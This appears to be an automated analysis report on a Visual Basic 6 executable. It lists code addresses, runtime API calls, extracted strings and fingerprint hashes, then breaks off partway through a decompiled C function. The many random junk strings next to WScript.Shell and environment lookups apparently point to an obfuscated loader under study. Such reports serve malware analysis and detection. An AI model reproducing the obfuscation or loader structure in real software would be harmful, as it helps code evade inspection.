0x0042b16b
0x0042b178
0x0042b18d
0x0042b17a
0x0042b17a
0x0042b180
0x0042b185
0x0042b185
0x0042b19b
0x0042b1a2
0x0042b1b5
0x0042b1c1
0x0042b1ca
0x0042b1d1
0x0042b1d8
0x0042b1d9
0x0042b1db
0x0042b1e9
0x0042b1ef
0x0042b1ff
0x0042b200
0x0042b206
0x0042b207
0x0042b20c
0x0042b219
0x0042b22e
0x0042b21b
0x0042b21b
0x0042b221
0x0042b226
0x0042b226
0x0042b235
0x0042b23c
0x0042b241
0x0042b247
0x0042b251
0x0042b292
0x0042b298
0x0042b2a5
0x0042b2c7
0x0042b2a7
0x0042b2a7
0x0042b2ac
0x0042b2b1
0x0042b2b4
0x0042b2ba
0x0042b2bf
0x0042b2bf
0x0042b2d5
0x0042b2e9
0x0042b2f1
0x0042b2fb
0x0042b30c
0x0042b319
0x0042b329
0x0042b334
0x0042b33a
0x0042b34d
0x0042b360
0x0042b36e
0x0042b37a
0x0042b397
0x0042b3a5
0x0042b3aa
0x0042b3b7
0x0042b3bc
0x0042b3c6
0x0042b3d7
0x0042b3de
0x0042b3e8
0x0042b3f5
0x0042b3ff
0x0042b404
0x0042b410
0x0042b416
0x0042b429
0x0042b435
0x0042b442
0x0042b44d
0x0042b453
0x0042b466
0x0042b496
0x0042b49c
0x0042b4a9
0x0042b4cb
0x0042b4ab
0x0042b4ab
0x0042b4b0
0x0042b4b5
0x0042b4b8
0x0042b4be
0x0042b4c3
0x0042b4c3
0x0042b4d9
0x0042b502
0x0042b51a
0x0042b522
0x0042b52c
0x0042b53d
0x0042b54a
0x0042b55a
0x0042b55f
0x0042b56e
0x0042b574
0x0042b587
0x0042b5b3
0x0042b5b9
0x0042b5c6
0x0042b5e8
0x0042b5c8
0x0042b5c8
0x0042b5cd
0x0042b5d2
0x0042b5d5
0x0042b5db
0x0042b5e0
0x0042b5e0
0x0042b606
0x0042b614
0x0042b624
0x0042b629
0x0042b633
0x0042b666
0x0042b66c
0x0042b679
0x0042b69b
0x0042b67b
0x0042b67b
0x0042b680
0x0042b685
0x0042b688
0x0042b68e
0x0042b693
0x0042b693
0x0042b6a2
0x0042b6a8
0x0042b6ae
0x0042b6be
0x0042b6c9
0x0042b6d0
0x0042b6dd
0x0042b6e7
0x0042b6f4
0x0042b6fa
0x0042b6ff
0x0042b70d
0x0042b71a
0x0042b720
0x0042b733
0x0042b753
0x0042b759
0x0042b766
0x0042b788
0x0042b768
0x0042b768
0x0042b76d
0x0042b772
0x0042b775
0x0042b77b
0x0042b780
0x0042b780
0x0042b7a6
0x0042b7ae
0x0042b7b3
0x0042b7bd
0x0042b7d0
0x0042b7d5
0x0042b7df
0x0042b7f5
0x0042b805
0x0042b80c
0x0042b812
0x0042b820
0x0042b826
0x0042b82d
0x0042b82e
0x0042b890
0x0042b898
0x0042b8a0
0x0042b8a8
0x0042b8b0
0x0042b8b8
0x0042b8c0
0x0042b8c8
0x0042b8d0
0x0042b8d8
0x0042b8e0
0x0042b8eb
0x0042b8f6
0x0042b901
0x0042b90c
0x0042b917
0x0042b922
0x0042b92d
0x0042b932
0x0042aa2a
0x0042aa2a
0x0042aa35
0x0042aa36
0x0042aa3b
0x0042aa41
0x0042aa42
0x0042aa4f
0x0042aa5a
0x0042aa5f
0x0042aa61
0x0042aa6e
0x0042aa73
0x0042aa78
0x0042aa7e
0x0042aa8d
0x0042aa9a
0x0042aab7
0x0042aa9c
0x0042aa9c
0x0042aaa1
0x0042aaa6
0x0042aaab
0x0042aaab
0x0042aac9
0x0042aae4
0x0042aae7
0x0042aae9
0x0042aaf6
0x0042ab18
0x0042aaf8
0x0042aaf8
0x0042aafa
0x0042aaff
0x0042ab05
0x0042ab0b
0x0042ab10
0x0042ab10
0x0042ab25
0x0042ab40
0x0042ab46
0x0042ab48
0x0042ab55
0x0042ab7a
0x0042ab57
0x0042ab57
0x0042ab5c
0x0042ab61
0x0042ab67
0x0042ab6d
0x0042ab72
0x0042ab72
0x0042ab87
0x0042ab8d
0x0042ab9d
0x0042aba8
0x0042abb4
0x0042abd1
0x0042abb6
0x0042abb6
0x0042abbb
0x0042abc0
0x0042abc5
0x0042abc5
0x0042abe3
0x0042abfe
0x0042ac01
0x0042ac03
0x0042ac10
0x0042ac32
0x0042ac12
0x0042ac12
0x0042ac14
0x0042ac19
0x0042ac1f
0x0042ac25
0x0042ac2a
0x0042ac2a
0x0042ac3f
0x0042ac5a
0x0042ac60
0x0042ac62
0x0042ac6f
0x0042ac94
0x0042ac71
0x0042ac71
0x0042ac76
0x0042ac7b
0x0042ac81
0x0042ac87
0x0042ac8c
0x0042ac8c
0x0042ac9b
0x0042aca2
0x0042acac
0x0042acac
0x0042acb1
0x0042acb5
0x0042acba
0x0042acbb
0x0042acc0
0x0042acc6
0x0042acd5
0x0042ace2
0x0042acff
0x0042ace4
0x0042ace4
0x0042ace9
0x0042acee
0x0042acf3
0x0042acf3
0x0042ad11
0x0042ad2c
0x0042ad2f
0x0042ad31
0x0042ad3e
0x0042ad60
0x0042ad40
0x0042ad40
0x0042ad42
0x0042ad47
0x0042ad4d
0x0042ad53
0x0042ad58
0x0042ad58
0x0042ad6d
0x0042ad88
0x0042ad8e
0x0042ad90
0x0042ad9d
0x0042adc2
0x0042ad9f
0x0042ad9f
0x0042ada4
0x0042ada9
0x0042adaf
0x0042adb5
0x0042adba
0x0042adba
0x0042adcf
0x0042add5
0x0042ade5
0x0042adf0
0x0042adfc
0x0042ae19
0x0042adfe
0x0042adfe
0x0042ae03
0x0042ae08
0x0042ae0d
0x0042ae0d
0x0042ae2b
0x0042ae46
0x0042ae49
0x0042ae4b
0x0042ae58
0x0042ae7a
0x0042ae5a
0x0042ae5a
0x0042ae5c
0x0042ae61
0x0042ae67
0x0042ae6d
0x0042ae72
0x0042ae72
0x0042ae87
0x0042aea2
0x0042aea8
0x0042aeaa
0x0042aeb7
0x0042aedc
0x0042aeb9
0x0042aeb9
0x0042aebe
0x0042aec3
0x0042aec9
0x0042aecf
0x0042aed4
0x0042aed4
0x0042aee3
0x0042aee9
0x0042aee9
0x0042aeee
0x0042aef3
0x0042aef8
0x0042aefe
0x0042af03
0x0042af08
0x0042af0d
0x0042af12
0x0042af1d
0x0042af1f
0x0042af24
0x0042af31
0x0042af36
0x0042af38
0x0042af3a
0x0042af3c
0x0042af41
0x0042af46
0x0042af4b
0x0042af52
0x0042af55
0x0042af55
0x0042af5a
0x0042af5d
0x0042af5e
0x0042af63
0x0042af69
0x0042af78
0x0042af7a
0x0042af80
0x0042af85
0x0042af92
0x0042af97
0x0042af9c
0x0042afa3
0x0042afa6
0x0042afa6
0x0042afab
0x0042afb1
0x0042afb2
0x0042afb7
0x0042afbe
0x0042afc3
0x0042afca
0x0042afcf
0x0042afd1
0x0042afd3
0x0042afda
0x0042afe0
0x0042afe9
0x0042afec
0x0042b952
0x0042b957
0x0042b95a
0x0042b95b
0x0042b95c
0x0042b967
0x0042b968
0x0042b974
0x0042b979
0x0042b97a
0x0042b97b
0x0042b97c
0x0042b97f
0x0042b986
0x0042b98d
0x0042b997
0x0042b998
0x0042b9a2
0x0042b9a7
0x0042b9ae
0x0042b9b8
0x0042b9be
0x0042b9c2
0x0042b9c5
0x0042b9c6
0x0042b9d0
0x0042b9d5
0x0042b9d6
0x0042b9e4
0x0042b9e9
0x0042b9ea
0x0042b9f4
0x0042b9f9
0x0042b9fa
0x0042ba01
0x0042ba07
0x0042ba11
0x0042ba15
0x0042ba19
0x0042ba1d
0x0042ba1e
0x0042ba20
0x0042ba2b
0x0042ba2f
0x0042ba30
0x0042ba32
0x0042ba37
0x0042ba43
0x0042ba50
0x0042ba6d
0x0042ba52
0x0042ba52
0x0042ba57
0x0042ba5c
0x0042ba61
0x0042ba61
0x0042ba7f
0x0042ba97
0x0042ba9a
0x0042ba9c
0x0042baa9
0x0042bacb
0x0042baab
0x0042baab
0x0042baad
0x0042bab2
0x0042bab8
0x0042babe
0x0042bac3
0x0042bac3
0x0042bad5
0x0042baf0
0x0042baf6
0x0042baf8
0x0042bb05
0x0042bb2a
0x0042bb07
0x0042bb07
0x0042bb0c
0x0042bb11
0x0042bb17
0x0042bb1d
0x0042bb22
0x0042bb22
0x0042bb38
0x0042bb3f
0x0042bb44
0x0042bb4b
0x0042bb5e
0x0042bb66
0x0042bb6a
0x0042bb6b
0x0042bb70
0x0042bb7a
0x0042bb87
0x0042bb8e
0x0042bb8f
0x0042bb92
0x0042bb93
0x0042bb98
0x0042bb99
0x0042bba3
0x0042bba8
0x0042bba9
0x0042bbab
0x0042bbad
0x0042bbaf
0x0042bbb7
0x0042bbbf
0x0042bbc3
0x0042bbc7
0x0042bbc8
0x0042bbca
0x0042bbd2
0x0042bbdc
0x0042bbef
0x0042bbf4
0x0042bbfc
0x0042bc00
0x0042bc01
0x0042bc06
0x0042bc0b
0x0042bc0c
0x0042bc0e
0x0042bc16
0x0042bc1a
0x0042bc1b
0x0042bc1d
0x0042bc22
0x0042bc25
0x0042bc27
0x0042bc27
0x0042bc2c
0x0042bc31
0x0042bc39
0x0042bc3a
0x0042bc3f
0x0042bc46
0x0042bc59
0x0042bc61
0x0042bc65
0x0042bc66
0x0042bc6e
0x0042bc6f
0x0042bc72
0x0042bc73
0x0042bc78
0x0042bc82
0x0042bc86
0x0042bc8a
0x0042bc8b
0x0042bc8d
0x0042bc95
0x0042bc9e
0x0042bca4
0x0042bcab
0x0042bcb2
0x0042bcb5
0x0042bcb6
0x0042bcbb
0x0042bcc2
0x0042bcc7
0x0042bcce
0x0042bcd8
0x0042bcdb
0x0042bce8
0x0042bce9
0x0042bcea
0x0042bceb
0x0042bcec
0x0042bcf1
0x0042bcf6
0x0042bcfb
0x0042bd05
0x0042bd0d
0x0042bd13
0x0042bd1d
0x0042bd20
0x0042bd27
0x0042bd2c
0x0042bd30
0x0042bd31
0x0042bd39
0x0042bd3a
0x0042bd44
0x0042bd4c
0x0042bd54
0x0042bd55
0x0042bd58
0x0042bd59
0x0042bd5b
0x0042bd60
0x0042bd63
0x0042bd68
0x0042bd6a
0x0042bd6c
0x0042bd71
0x0042bd74
0x0042bdbb
0x0042bdc0
0x0042aff2
0x0042aff2
0x00000000
0x0042aff8
0x00000000
0x0042afec
0x0042b004
0x0042b021
0x0042b006
0x0042b006
0x0042b00b
0x0042b010
0x0042b015
0x0042b015
0x0042b033
0x0042b04e
0x0042b051
0x0042b053
0x0042b060
0x0042b082
0x0042b062
0x0042b062
0x0042b064
0x0042b069
0x0042b06f
0x0042b075
0x0042b07a
0x0042b07a
0x0042b08f
0x0042b0aa
0x0042b0b0
0x0042b0b2
0x0042b0bf
0x0042b0e4
0x0042b0c1
0x0042b0c1
0x0042b0c6
0x0042b0cb
0x0042b0d1
0x0042b0d7
0x0042b0dc
0x0042b0dc
0x0042b0f1
0x0042b0f7
0x0042b107
0x0042b112
0x0042b112
0x00000000
0x0042afda
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401326), ref: 0042A2B2
__vbaOnError.MSVBVM60(00000000,?,?,?,?,00401326), ref: 0042A2EA
#685.MSVBVM60(00000000,?,?,?,?,00401326), ref: 0042A2EF
__vbaObjSet.MSVBVM60(?,00000000,00000000,?,?,?,?,00401326), ref: 0042A2FC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410130,0000001C), ref: 0042A343
#588.MSVBVM60(00000037,0000000B,000000F6), ref: 0042A392
#704.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE,00000037,0000000B,000000F6), ref: 0042A3C2
__vbaStr.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE,00000037,0000000B,000000F6), ref: 0042A3CC
__vbaFreeVar.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE,00000037,0000000B,000000F6), ref: 0042A3D7
__vbaNew2.MSVBVM60(00410160,0042F414,00000003,000000FF,000000FE,000000FE,000000FE,00000037,0000000B,000000F6), ref: 0042A3EF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410150,00000014), ref: 0042A454
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410170,00000078), ref: 0042A4B0
#588.MSVBVM60(00000034,0000002B,0000001D), ref: 0042A4E3
#714.MSVBVM60(?,00000004,00000000,00000034,0000002B,0000001D), ref: 0042A51E
__vbaVarTstLt.MSVBVM60(?,00008003,?,00000004,00000000,00000034,0000002B,0000001D), ref: 0042A531
__vbaFreeVarList.MSVBVM60(00000002,00000004,?,?,00008003,?,00000004,00000000,00000034,0000002B,0000001D), ref: 0042A54D
__vbaNew2.MSVBVM60(00410160,0042F414,?,?,00401326), ref: 0042A577
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410150,00000014), ref: 0042A5DC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410170,00000058), ref: 0042A638
__vbaStr.MSVBVM60(00000000,?,00410170,00000058), ref: 0042A668
__vbaNew2.MSVBVM60(00410160,0042F414), ref: 0042A68B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410150,0000004C), ref: 0042A6F0
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410180,00000028), ref: 0042A745
__vbaStrCopy.MSVBVM60(?,?,00401326), ref: 0042A76C
#618.MSVBVM60(?,00000075,?,?,00401326), ref: 0042A776
__vbaStr.MSVBVM60(?,00000075,?,?,00401326), ref: 0042A783
__vbaStrCmp.MSVBVM60(BRSTENBINDERNE,00000000,?,00000075,?,?,00401326), ref: 0042A78E
__vbaNew2.MSVBVM60(00410160,0042F414,BRSTENBINDERNE,00000000,?,00000075,?,?,00401326), ref: 0042A7CE
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410150,00000014), ref: 0042A833
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410170,000000E8), ref: 0042A895
__vbaStr.MSVBVM60(00000000,?,00410170,000000E8), ref: 0042A8C8
#716.MSVBVM60(?,WScript.Shell,00000000), ref: 0042A8E6
__vbaObjVar.MSVBVM60(?,?,WScript.Shell,00000000), ref: 0042A8F2
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,WScript.Shell,00000000), ref: 0042A8FC
__vbaFreeVar.MSVBVM60(?,00000000,?,?,WScript.Shell,00000000), ref: 0042A907
__vbaChkstk.MSVBVM60(?,00000000,?,?,WScript.Shell,00000000), ref: 0042A937
__vbaChkstk.MSVBVM60(Item,00000001,?,00000000,?,?,WScript.Shell,00000000), ref: 0042A952
__vbaLateMemCallLd.MSVBVM60(?,?,Environment,00000001,Item,00000001,?,00000000,?,?,WScript.Shell,00000000), ref: 0042A974
__vbaVarLateMemCallLd.MSVBVM60(?,00000000,?,?,?,?,BRSTENBINDERNE,00000000,?,00000075,?,?,00401326), ref: 0042A984
__vbaStrVarMove.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042A98D
__vbaStr.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042A99A
__vbaFreeVarList.MSVBVM60(00000002,?,?,00000000), ref: 0042A9AF
__vbaStrToAnsi.MSVBVM60(?,Britska4,BRSTENBINDERNE,00000000,?,00000075,?,?,00401326), ref: 0042A9C3
__vbaStrToAnsi.MSVBVM60(?,Citrous,00000000,?,Britska4,BRSTENBINDERNE,00000000,?,00000075,?,?,00401326), ref: 0042A9D5
__vbaSetSystemError.MSVBVM60(00000000,?,Citrous,00000000,?,Britska4,BRSTENBINDERNE,00000000,?,00000075,?,?,00401326), ref: 0042A9E6
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0042AA13
#541.MSVBVM60(?,20:20:20,00000000,?,00000075,?,?,00401326), ref: 0042AA36
__vbaStrVarMove.MSVBVM60(?,?,20:20:20,00000000,?,00000075,?,?,00401326), ref: 0042AA42
__vbaStr.MSVBVM60(?,?,20:20:20,00000000,?,00000075,?,?,00401326), ref: 0042AA4F
__vbaFreeVar.MSVBVM60(?,?,20:20:20,00000000,?,00000075,?,?,00401326), ref: 0042AA5A
#525.MSVBVM60(00000015,?,?,20:20:20,00000000,?,00000075,?,?,00401326), ref: 0042AA61
__vbaStr.MSVBVM60(00000015,?,?,20:20:20,00000000,?,00000075,?,?,00401326), ref: 0042AA6E
__vbaSetSystemError.MSVBVM60(00000015,?,?,20:20:20,00000000,?,00000075,?,?,00401326), ref: 0042AA7E
__vbaNew2.MSVBVM60(00410160,0042F414), ref: 0042AAA6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410150,00000014), ref: 0042AB0B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410170,00000110), ref: 0042AB6D
__vbaStr.MSVBVM60(00000000,?,00410170,00000110), ref: 0042AB9D
__vbaNew2.MSVBVM60(00410160,0042F414), ref: 0042ABC0
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410150,00000014), ref: 0042AC25
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410170,00000140), ref: 0042AC87
__vbaUI1I2.MSVBVM60 ref: 0042ACB5
__vbaSetSystemError.MSVBVM60(00000000), ref: 0042ACC6
__vbaNew2.MSVBVM60(00410160,0042F414,00000000), ref: 0042ACEE
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410150,00000014), ref: 0042AD53
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410170,000000D0), ref: 0042ADB5
__vbaStr.MSVBVM60(00000000,?,00410170,000000D0), ref: 0042ADE5
__vbaNew2.MSVBVM60(00410160,0042F414), ref: 0042AE08
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410150,00000014), ref: 0042AE6D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410170,00000138), ref: 0042AECF
__vbaSetSystemError.MSVBVM60(007645E8,00000000), ref: 0042AEFE
#588.MSVBVM60(000000BE,0000009C,00000086,007645E8,00000000), ref: 0042AF12
#525.MSVBVM60(000000F8,000000BE,0000009C,00000086,007645E8,00000000), ref: 0042AF24
__vbaStr.MSVBVM60(000000F8,000000BE,0000009C,00000086,007645E8,00000000), ref: 0042AF31
#712.MSVBVM60(Incestuses,Cataphora5,chinotti,00000001,000000FF,00000000,000000F8,000000BE,0000009C,00000086,007645E8,00000000), ref: 0042AF4B
__vbaStr.MSVBVM60(Incestuses,Cataphora5,chinotti,00000001,000000FF,00000000,000000F8,000000BE,0000009C,00000086,007645E8,00000000), ref: 0042AF55
__vbaSetSystemError.MSVBVM60(?,000000BE,0000009C,00000086,007645E8,00000000), ref: 0042AF69
__vbaStrCat.MSVBVM60(chassis,?,?,000000BE,0000009C,00000086,007645E8,00000000), ref: 0042AF85
__vbaStr.MSVBVM60(chassis,?,?,000000BE,0000009C,00000086,007645E8,00000000), ref: 0042AF92
#527.MSVBVM60(Svalebajernes,chassis,?,?,000000BE,0000009C,00000086,007645E8,00000000), ref: 0042AF9C
__vbaStr.MSVBVM60(Svalebajernes,chassis,?,?,000000BE,0000009C,00000086,007645E8,00000000), ref: 0042AFA6
__vbaSetSystemError.MSVBVM60(?,?,000000BE,0000009C,00000086,007645E8,00000000), ref: 0042AFBE
#588.MSVBVM60(00000075,00000022,00000089,?,?,000000BE,0000009C,00000086,007645E8,00000000), ref: 0042AFD3
__vbaNew2.MSVBVM60(00410160,0042F414,00000075,00000022,00000089,?,?,000000BE,0000009C,00000086,007645E8,00000000), ref: 0042B010
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410150,00000014), ref: 0042B075
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410170,000000E0), ref: 0042B0D7
__vbaStr.MSVBVM60(00000000,?,00410170,000000E0), ref: 0042B107
#593.MSVBVM60(0000000A), ref: 0042B132
__vbaFpR4.MSVBVM60(0000000A), ref: 0042B143
#564.MSVBVM60(00000004,?,?,?,?,0000000A), ref: 0042B166
__vbaHresultCheck.MSVBVM60(00000000), ref: 0042B180
__vbaI4Var.MSVBVM60(?,?), ref: 0042B1A2
__vbaFreeVarList.MSVBVM60(00000003,0000000A,00000004,?), ref: 0042B1DB
#564.MSVBVM60(00000004,?), ref: 0042B207
__vbaHresultCheck.MSVBVM60(00000000), ref: 0042B221
__vbaI4Var.MSVBVM60(?), ref: 0042B23C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FDBC,000006F8), ref: 0042B2BA
__vbaFreeVarList.MSVBVM60(00000002,00000004,?), ref: 0042B2E9
#572.MSVBVM60(00000002), ref: 0042B30C
__vbaStr.MSVBVM60(00000002), ref: 0042B319
__vbaStrCopy.MSVBVM60(00000002), ref: 0042B329
__vbaStr.MSVBVM60(?,Gruesomest,?,00000002), ref: 0042B360
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0042B397
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000075), ref: 0042B3A5
#669.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000075), ref: 0042B3AA
__vbaStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000075), ref: 0042B3B7
#573.MSVBVM60(?,00000002), ref: 0042B3DE
#523.MSVBVM60(Vrvl9,?,00000002), ref: 0042B3E8
__vbaStr.MSVBVM60(Vrvl9,?,00000002), ref: 0042B3F5
__vbaLenBstrB.MSVBVM60(Desserttallerken,Vrvl9,?,00000002), ref: 0042B3FF
__vbaStr.MSVBVM60(Desserttallerken,Vrvl9,?,00000002), ref: 0042B429
__vbaStrVarMove.MSVBVM60(?,Desserttallerken,Vrvl9,?,00000002), ref: 0042B435
__vbaStr.MSVBVM60(?,Desserttallerken,Vrvl9,?,00000002), ref: 0042B442
__vbaStr.MSVBVM60(?,Desserttallerken,Vrvl9,?,00000002), ref: 0042B466
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FDBC,000006FC), ref: 0042B4BE
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,00000000,00000000), ref: 0042B502
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0042B51A
#574.MSVBVM60(00000003), ref: 0042B53D
__vbaStr.MSVBVM60(00000003), ref: 0042B54A
__vbaStrCopy.MSVBVM60(00000003), ref: 0042B55A
__vbaStr.MSVBVM60 ref: 0042B587
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FDBC,00000704), ref: 0042B5DB
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0042B606
__vbaFreeVar.MSVBVM60 ref: 0042B614
__vbaStrCopy.MSVBVM60 ref: 0042B624
__vbaHresultCheckObj.MSVBVM60(?,?,0040FDBC,00000708), ref: 0042B68E
__vbaStr.MSVBVM60(?,?,0040FDBC,00000708), ref: 0042B6BE
#525.MSVBVM60(0000000A), ref: 0042B6D0
__vbaStr.MSVBVM60(0000000A), ref: 0042B6DD
#697.MSVBVM60(000038F5,0000000A), ref: 0042B6E7
__vbaStr.MSVBVM60(000038F5,0000000A), ref: 0042B6F4
#696.MSVBVM60(00000000,000038F5,0000000A), ref: 0042B6FA
__vbaStr.MSVBVM60(00000000,000038F5,0000000A), ref: 0042B733
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FDBC,0000070C), ref: 0042B77B
__vbaFreeStrList.MSVBVM60(00000003,?,00000000,00000000), ref: 0042B7A6
__vbaVarMove.MSVBVM60 ref: 0042B7D0
__vbaVarMove.MSVBVM60 ref: 0042B7F5
__vbaVarIdiv.MSVBVM60(?,00000000,?), ref: 0042B80C
__vbaI4Var.MSVBVM60(00000000,?,00000000,?), ref: 0042B812
__vbaFreeVar.MSVBVM60(0042B933), ref: 0042B890
__vbaFreeVar.MSVBVM60(0042B933), ref: 0042B90C

Strings

Citrous, xrefs: 0042A9C9
CHARCOALY, xrefs: 0042B31E
1, xrefs: 0042AFE0
Zoolog9, xrefs: 0042B54F
chassis, xrefs: 0042AF80
Desserttallerken, xrefs: 0042B3FA
tmp, xrefs: 0042BB44
Ramshackly5, xrefs: 0042BCEC
Ethnomaniac3, xrefs: 0042A764
Beadroll6, xrefs: 0042B280
Forladende4, xrefs: 0042B268
Item, xrefs: 0042A94A
Fantasirig, xrefs: 0042BC31
WINDIR, xrefs: 0042A90C
Cataphora5, xrefs: 0042AF41
Vrvl9, xrefs: 0042B3E3
Gruesomest, xrefs: 0042B348
Facetslebnes, xrefs: 0042B619
windir, xrefs: 0042BC3F
Doserende6, xrefs: 0042AE8F
Unbetide, xrefs: 0042BBD2
20:20:20, xrefs: 0042AA2A
DOKUMENTTYPEN, xrefs: 0042BCF1
Svalebajernes, xrefs: 0042AF97
chinotti, xrefs: 0042AF3C
Environment, xrefs: 0042A965
Besvige, xrefs: 0042BC2C
Comose9, xrefs: 0042B59F
PROCESS, xrefs: 0042A920
Britska4, xrefs: 0042A9B7
BRSTENBINDERNE, xrefs: 0042A789
SNORE, xrefs: 0042B64B
Swingpjatter, xrefs: 0042BCF6
WScript.Shell, xrefs: 0042A8DA
Incestuses, xrefs: 0042AF46

Memory Dump Source

Source File: 00000000.00000002.463862352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.463827063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470200386.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470229501.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$List$New2$Error$System$Move$#588Copy$#525Chkstk$#564AnsiCallLate$#523#527#541#572#573#574#593#618#669#685#696#697#704#712#714#716AddrefBstrIdiv
String ID: 1$20:20:20$BRSTENBINDERNE$Beadroll6$Besvige$Britska4$CHARCOALY$Cataphora5$Citrous$Comose9$DOKUMENTTYPEN$Desserttallerken$Doserende6$Environment$Ethnomaniac3$Facetslebnes$Fantasirig$Forladende4$Gruesomest$Incestuses$Item$PROCESS$Ramshackly5$SNORE$Svalebajernes$Swingpjatter$Unbetide$Vrvl9$WINDIR$WScript.Shell$Zoolog9$chassis$chinotti$tmp$windir
API String ID: 998405700-1483196130
Opcode ID: 94f6be5491f07fd3346f1acb0e3345e49cfccd3c35a6c8f8ab87783df92b7da1
Instruction ID: 36b8e12b77abc2d52137f04b2b446631e5c923740c9961339af1f3e7187b69a5
Opcode Fuzzy Hash: 94f6be5491f07fd3346f1acb0e3345e49cfccd3c35a6c8f8ab87783df92b7da1
Instruction Fuzzy Hash: F9E21871900228EFDB21EF51CD45BDEB7B4BF44305F4041EAE50ABB2A1DB785A888F59

Uniqueness

Uniqueness Score: -1.00%

Function 0042D58D, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E0042D58D(void* __ebx, void* __ecx, void* __edi, void* _a4, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed short _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v44;
				signed char _v52;
				intOrPtr _v60;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v84;
				signed int _v88;
				signed int _v96;
				signed int _t86;
				char* _t89;
				intOrPtr _t90;
				short _t91;
				signed short _t104;
				void* _t115;
				signed int _t117;
				char _t119;
				signed int _t133;
				signed int _t140;
				intOrPtr _t147;
				intOrPtr _t150;
				void* _t155;
				intOrPtr _t156;
				void* _t160;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t167;
				intOrPtr _t172;

				_t161 = _t172;
				 *[fs:0x0] = _t172;
				L00401320();
				_v12 = _t172;
				_v8 = 0x401308;
				L00401572();
				_t86 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v72,  &_v24, _a4, __edi, _t155, __ebx, 0x44,  *[fs:0x0], 0x401326, __ecx, __ecx, _t160);
				asm("fclex");
				_v76 = _t86;
				if(_v76 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x40fd8c);
					_push(_a4);
					_push(_v76);
					L004015C6();
					_v84 = _t86;
				}
				_v32 = _v72;
				_push(_a4);
				_push( &_v36);
				L00401572();
				_t89 =  &_v36;
				_push(_t89);
				L004013B6();
				_push(_t89);
				L15();
				_v28 = _t89;
				L004015C0();
				_push(_v28);
				L15();
				_t90 = _t89 + 0x2b0;
				if(_t90 < 0) {
					L004014BE();
					_push(_t161);
					_t162 = _t172;
					_t91 =  *0x42f044;
					if(_t91 == 0) {
						L13:
						return _t91;
					} else {
						_t91 = _v0 -  *0x42f040;
						if(_t91 < 0) {
							L004014BE();
							_push(_t162);
							_t164 = _t172;
							_push(8);
							L00401320();
							if( *0x42f044 == 0) {
								L18:
								return _v16;
							} else {
								_v20 = E0042D947(_v4);
								_t98 = _v4 + 2;
								if(_v4 + 2 < 0) {
									L004014BE();
									_push(_t164);
									_t166 = _t172;
									_push(4);
									L00401320();
									if((_v68 & 0x80) == 0) {
										_t104 = (_v4 & 0x000000ff) * 0x100;
										if(_t104 < 0) {
											goto L26;
										} else {
											_v20 = _t104 | _v8 & 0x000000ff;
											goto L25;
										}
									} else {
										if((_v4 & 0x000000ff) * 0x100 < 0) {
											L26:
											L004014BE();
											_push(_t166);
											_t167 = _t172;
											_push(4);
											L00401320();
											if((_v72 & 0x00008000) == 0) {
												_t109 = _v8 & 0x0000ffff;
												_v24 = _v8 & 0x0000ffff;
											} else {
												_t109 = _v8 | 0xffff0000;
												_v24 = _v8 | 0xffff0000;
											}
											L004015E4();
											E0042D886(_v12, _t109);
											asm("cdq");
											L004015E4();
											_push((_v8 & 0xffff0000) / 0x10000);
											_t115 = _v12 + 2;
											if(_t115 < 0) {
												L004014BE();
												_push(_t167);
												_push(4);
												L00401320();
												_push(_t155);
												_t117 = 1;
												_t140 = 1;
												_t150 =  *0x42f034; // 0x605420
